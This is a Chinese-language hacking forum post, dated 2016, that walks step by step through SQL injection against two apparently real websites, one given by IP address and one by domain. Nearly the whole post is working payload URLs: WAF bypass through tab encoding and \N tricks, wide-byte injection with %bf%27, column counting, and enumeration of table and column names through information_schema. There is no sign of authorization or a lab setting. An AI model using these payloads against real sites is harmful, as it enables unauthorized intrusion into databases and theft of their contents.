|
|
阔别上一个注入好久了已经:http://user.qzone.qq.com/775983572/blog/1437492568
这里我换了个基友@Mirr0r 么么哒~
第一个注入:
http://147.8.205.94/newsview.php?id=8
http://147.8.205.94/newsview.php?id=8 and 1=1,有waf,当前链接已被重置
怀疑过滤空格,%09绕过,
http://147.8.205.94/newsview.php?id=8%09order%09by%092,访问正常,判断两个字段
http://147.8.205.94/newsview.php?id=8%09union%09select%091,2 访问出错,怀疑union或者是select被过滤
http://147.8.205.94/newsview.php?id=8%09Union%09selEct%091,2 大小写失败
http://147.8.205.94/newsview.php?id=\NUnion%09selEct%091,2 利用\Nunion 成功:
读取数据库,用户 http://147.8.205.94/newsview.php?id=\NUnion%09selEct%09version(),database():
读取所有表名、字段语句:http://147.8.205.94/newsview.php?id=\NUnion%09selEct%09%28Select+export_set%285,@:=0,%28select+count%28*%29from%28information_schema.columns%29where@:=export_set%285,export_set%285,@,table_name,0x3c6c693e,2%29,column_name,0xa3a,2%29%29,@,2%29%29,2
第二个注入点http://www.cwcv.cn/cert/index.php?id=admin
加个单引号就知道要用宽字节注入了:
http://www.cwcv.cn/cert/index.php?id=admin%bf%27 后面还有个单引号,
不能使用“--”,就用#闭合,get请求需要把# url编码:
http://www.cwcv.cn/cert/index.php?id=admin%bf%27%09or%091=1%23 使用or 1=1语句成立,因为当admin%bf%27以后,admin就变admin縗了,两者不一样了不能使用and,只能使用or,或,1=1永远为真:
http://www.cwcv.cn/cert/index.php?id=admin%bf%27%09union%09select%091,2,3%23 正好三列:
因为过滤tables,所以通过information_schema.columns读取表名(columns表也有table_name这个列)http://www.cwcv.cn/cert/index.php?id=admin%df%27%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.columns%09where%09table_schema=0x63726d73%23(这里空格过滤,所以使用%09,也可以使用%0a、/**/等,0xxxxx是库的16进制)
|
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2016-4-13 21:44:27
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2016-4-28 22:48:11
楼主